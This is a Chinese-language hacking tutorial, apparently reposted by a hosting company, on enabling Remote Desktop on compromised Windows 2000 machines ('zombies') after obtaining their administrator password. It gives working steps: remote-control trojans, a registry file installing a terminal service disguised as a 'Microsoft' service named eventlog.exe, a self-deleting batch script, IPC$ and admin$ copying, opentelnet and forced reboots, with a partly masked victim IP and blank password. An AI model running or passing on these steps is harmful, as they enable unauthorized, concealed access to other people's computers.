在win2000 Professional版中安裝3389終端服務(wù)
眾所周知windows2000 profassional并不支持3389終端服務(wù),所以我們?nèi)绻l(fā)現(xiàn)得到管理員密碼的肉機是此版本,只能放棄安裝終端服務(wù)的念頭。但是現(xiàn)在我們已經(jīng)可以在profassional版中安裝終端服務(wù)了!
方法如下:
1. 將profassional版改變?yōu)閟erver版
2. 安裝終端服務(wù)
關(guān)于安裝終端服務(wù)的細節(jié)網(wǎng)絡(luò)中已經(jīng)有許多優(yōu)秀的文章,這里不再重復(fù)。
下邊就說說如何將profassional版改變?yōu)閟erver版:
原理:其實windows 2000的各個版本都使用了同樣的程序、動態(tài)鏈接庫,它們之間最大的差別是在注冊表中。windows2000三合一光盤就證明了這一點。因此只要將profassional版注冊表中的相關(guān)項目改為server及以上版本,就可以在profassional版中安裝終端服務(wù)了。
現(xiàn)在3am Laboratories已經(jīng)將改變win2000版本的方法做成一個非常方便使用的軟件:NTSwitch,讓我們可以隨心所欲地快速改變版本。此軟件可以在小鳳居中下載到,下載地址為URL http://www.chinesehack.org/down/show.asp?id=2192&down=1
可能由于微軟的壓力,3am Laboratories已將此軟件從其主頁中刪除,大家快下載吧!
遠程版本變換的具體實現(xiàn)方法:
法1:
1 在遠程肉機上運行支持圖形界面的遠程控制程序(如:冰河、PcAnyWhere等)
2 遠程控制下,下載并運行NTSwitch改變版本
3 安裝3389終端服務(wù)
此法非常方便,技術(shù)要求最低。但操作過程對方是全部可以看見的,非常危險!
法2:
1 自己將自己本地的win2000 professional改變?yōu)閣in2000 server版,利用注冊表對比軟件對比版本變換前后注冊表的差別。將差別制作成一個chang.reg文件。
2 利用所得到的肉機管理員密碼,開啟肉機Telnet服務(wù)。
3 Telnet上肉機后,利用regedit.exe /s chang.reg 命令, 將遠程注冊表改變,從而實現(xiàn)遠程win2000的版本變換。
此法需要一定的經(jīng)驗,但操作很安全。而且可以用“迷途vb”的方法進一步安裝3389終端服務(wù)。
以下是“迷途vb”的安裝3389終端服務(wù)方法
========================
首先我們制作開啟3389的工具
先把下面的注冊表內(nèi)容copy一份,另存為3389.reg注冊表文件
注冊表內(nèi)容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
再把下面的內(nèi)容保存為批處理文件3389.bat
安裝批處理內(nèi)容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解壓縮包
61.188.***.*** user:administrato pass:空
先使用工具letmein判斷其操作系統(tǒng)
letmein \\ip -all -d
TsInternetUser (TsInternetUser)這個是2000的終端用戶,現(xiàn)在可以判斷其為2000server了
再使用終端登陸軟件看看他的3389是不是已經(jīng)開啟了免了費事折騰
應(yīng)該沒有開啟了
建立ipc連接
copy工具過去
net use \\ip\ipc$ "pass" /user:name
copy file \\ip\admin$\system32
用opentelnet開對方的telnet
opentelnet \\ip name pass 1 99
用telnet進入
進入到對方的winnt\system32\
目錄
解壓縮3389.exe
運行安裝批處理3389.bat
現(xiàn)在我們把對方重起一下,用reboot
我們用ping命令監(jiān)視他的上線情況,等他下線,呵呵下了,又上來了,不慌連,3389等會才能好,對方的機器有點慢
看見了么,開啟成功!
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【mszdt.com】
服務(wù)器租用/服務(wù)器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM]
|